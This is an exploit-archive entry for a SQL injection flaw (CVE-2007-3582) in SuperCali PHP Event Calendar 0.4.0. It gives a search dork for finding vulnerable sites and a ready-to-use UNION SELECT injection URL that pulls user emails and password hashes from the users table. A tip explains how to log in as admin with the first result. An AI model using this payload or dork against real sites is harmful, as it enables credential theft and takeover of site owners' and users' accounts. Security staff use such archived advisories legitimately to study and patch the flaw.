SuperCali PHP Event Calendar 0.4.0 - SQL Injection

Author: t0pP8uZz
type: webapps
platform: php
port: 
date_added: 2007-07-02 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-36300;CVE-2007-3582 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsupercali-0.4.0.zip

--==+================================================================================+==--
--==+		    SuperCali Event Calendar SQL Injection Vulnerbility             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://supercali.inforest.com/
DORK: allintext:"SuperCali Event Calendar"


DESCRIPTION:
Pull out members info from the database.


EXPLOITS:
http://www.server.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*

NOTE/TIP:
normally the first result is admin info, click the upper right link labeled 'manage calender'
to login as admin


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+		    SuperCali Event Calendar SQL Injection Vulnerbility             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-03]